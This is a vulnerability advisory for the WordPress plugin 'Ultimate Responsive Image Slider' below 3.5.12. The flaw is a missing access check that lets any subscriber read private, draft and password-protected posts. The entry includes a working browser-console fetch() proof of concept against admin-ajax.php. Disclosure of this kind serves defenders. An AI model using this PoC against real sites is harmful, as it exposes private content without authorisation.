Lucene search

K
wpvulndbKrzysztof Zając (CERT PL)WPVDB-ID:1AFC0E4A-F712-47D4-BF29-7719CCBBBB1B
HistoryNov 23, 2023 - 12:00 a.m.

Slider - Ultimate Responsive Image Slider < 3.5.12 - Subscriber+ Arbitrary Post Access

2023-11-2300:00:00
Krzysztof Zając (CERT PL)
wpscan.com
13
plugin
ajax action
authenticated users
private post
draft post
password protected
web browser
subscriber user
developer console
poc
command
content
vulnerability

AI Score

6.7

Confidence

High

EPSS

0.001

Percentile

18.1%

Description The plugin does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated users, such as subscriber to access the content arbitrary post such as private, draft and password protected

PoC

Run the below command in the developer console of the web browser while being on the blog as subscriber user (4 being the ID of a private/draft/password protected post) fetch(“/wp-admin/admin-ajax.php?action=uris_get_thumbnail”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “imageid=4”, “method”: “POST”, }).then((response) => {return response.text(); }) .then((data) => { console.log(data); }) The content of the post will be displayed in the rpgp_image_desc textarea.

AI Score

6.7

Confidence

High

EPSS

0.001

Percentile

18.1%

Related for WPVDB-ID:1AFC0E4A-F712-47D4-BF29-7719CCBBBB1B